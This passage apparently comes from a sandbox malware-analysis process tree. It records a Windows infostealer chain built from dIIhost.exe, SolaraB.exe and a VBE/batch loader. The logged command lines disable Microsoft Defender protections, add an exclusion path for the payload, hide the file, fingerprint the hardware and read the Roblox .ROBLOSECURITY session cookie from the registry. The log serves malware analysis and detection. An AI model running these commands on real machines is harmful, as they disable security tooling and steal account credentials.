        "wmic.exe" computersystem get totalphysicalmemory
        33⤵
        
        PID:4092
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:1420
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        33⤵
        
        PID:4924
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        33⤵
        Detects videocard installed
        
        PID:3408
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:4588
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        33⤵
        
        PID:2120
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        34⤵
        Runs ping.exe
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        32⤵
        Modifies registry class
        
        PID:4796
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        33⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        34⤵
        
        PID:2452
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        35⤵
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        31⤵
        
        PID:3196
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        31⤵
        Checks computer location settings
        Modifies registry class
        
        PID:2256
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        32⤵
        
        PID:5116
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        33⤵
        
        PID:3220
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        34⤵
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        30⤵
        Drops file in Drivers directory
        
        PID:4804
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        31⤵
        
        PID:2252
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        31⤵
        Views/modifies file attributes
        
        PID:3220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        31⤵
        
        PID:4736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        31⤵
        
        PID:4060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        31⤵
        
        PID:2604
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        32⤵
        
        PID:4776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        31⤵
        
        PID:3912
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        31⤵
        
        PID:2240
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        32⤵
        
        PID:2228
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        31⤵
        
        PID:568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        31⤵
        
        PID:5096
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        31⤵
        Detects videocard installed
        
        PID:3884
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        32⤵
        
        PID:4960
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        31⤵
        
        PID:4736
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        32⤵
        Runs ping.exe
        
        PID:4392
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        30⤵
        Checks computer location settings
        Modifies registry class
        
        PID:2028
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        31⤵
        Checks computer location settings
        
        PID:2560
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        32⤵
        
        PID:1248
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        33⤵
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        29⤵
        
        PID:3620
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        29⤵
        Modifies registry class
        
        PID:1880
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        30⤵
        Checks computer location settings
        
        PID:4084
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        31⤵
        
        PID:4368
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        32⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        28⤵
        Drops file in Drivers directory
        
        PID:1820
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:3408
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        29⤵
        Views/modifies file attributes
        
        PID:1868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        29⤵
        
        PID:1808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        
        PID:2224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        
        PID:4296
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        29⤵
        
        PID:3408
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        29⤵
        
        PID:2676
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:332
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:3928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        29⤵
        
        PID:1336
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        29⤵
        Detects videocard installed
        
        PID:224
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        29⤵
        
        PID:4236
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        30⤵
        Runs ping.exe
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        28⤵
        Modifies registry class
        
        PID:2224
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        29⤵
        Checks computer location settings
        
        PID:5028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        30⤵
        
        PID:4308
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        31⤵
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        27⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        27⤵
        Modifies registry class
        
        PID:1564
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        28⤵
        Checks computer location settings
        
        PID:904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        29⤵
        
        PID:3620
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        30⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        26⤵
        Drops file in Drivers directory
        
        PID:2796
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        27⤵
        
        PID:4776
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        27⤵
        Views/modifies file attributes
        
        PID:2772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5092
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:3636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        27⤵
        
        PID:4760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        
        PID:1420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        27⤵
        
        PID:3428
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        27⤵
        
        PID:1808
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        27⤵
        
        PID:4448
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        27⤵
        
        PID:1668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        27⤵
        
        PID:2252
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        27⤵
        Detects videocard installed
        
        PID:1016
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        27⤵
        
        PID:3260
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        28⤵
        Runs ping.exe
        
        PID:1564
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        26⤵
        Modifies registry class
        
        PID:4592
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        27⤵
        Checks computer location settings
        
        PID:2272
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        28⤵
        
        PID:4448
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        29⤵
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        25⤵
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        25⤵
        Modifies registry class
        
        PID:4548
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        26⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        27⤵
        
        PID:2704
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        28⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        24⤵
        Drops file in Drivers directory
        
        PID:4660
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:4592
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        25⤵
        Views/modifies file attributes
        
        PID:4760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        25⤵
        
        PID:568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        
        PID:3844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        
        PID:2776
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:3588
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        25⤵
        
        PID:2328
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:368
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        25⤵
        
        PID:1808
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:3028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        25⤵
        
        PID:4736
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:2604
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        25⤵
        Detects videocard installed
        
        PID:5052
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        25⤵
        
        PID:1368
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        26⤵
        Runs ping.exe
        
        PID:1836
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        24⤵
        Modifies registry class
        
        PID:4240
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        25⤵
        Checks computer location settings
        
        PID:3556
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        26⤵
        
        PID:1076
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        27⤵
        
        PID:180
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        23⤵
        
        PID:1604
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        23⤵
        Modifies registry class
        
        PID:5028
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        24⤵
        Checks computer location settings
        
        PID:1580
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        25⤵
        
        PID:2180
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        26⤵
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        22⤵
        Drops file in Drivers directory
        
        PID:1400
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:4824
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:3856
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        23⤵
        Views/modifies file attributes
        
        PID:4588
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        23⤵
        
        PID:4220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        
        PID:5088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:2228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        
        PID:2020
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        23⤵
        
        PID:3292
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        23⤵
        
        PID:640
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:2500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        23⤵
        
        PID:5112
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        23⤵
        Detects videocard installed
        
        PID:4548
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        23⤵
        
        PID:3512
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        24⤵
        Runs ping.exe
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        22⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3912
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        23⤵
        Checks computer location settings
        
        PID:616
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        24⤵
        
        PID:4372
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        
        PID:3796
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        25⤵
        
        PID:944
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        21⤵
        
        PID:1616
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        21⤵
        Checks computer location settings
        Modifies registry class
        
        PID:672
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        22⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        23⤵
        
        PID:5116
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        24⤵
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        20⤵
        Drops file in Drivers directory
        
        PID:1692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:4876
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        21⤵
        Views/modifies file attributes
        
        PID:3636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        21⤵
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        
        PID:1724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        21⤵
        
        PID:736
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        21⤵
        
        PID:1468
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        21⤵
        
        PID:3408
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        21⤵
        
        PID:1420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        21⤵
        
        PID:2112
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        21⤵
        Detects videocard installed
        
        PID:1080
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        21⤵
        
        PID:1788
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        22⤵
        Runs ping.exe
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        20⤵
        Checks computer location settings
        Modifies registry class
        
        PID:2172
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        21⤵
        Checks computer location settings
        
        PID:3648
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        22⤵
        
        PID:4604
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        23⤵
        
        PID:224
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        19⤵
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
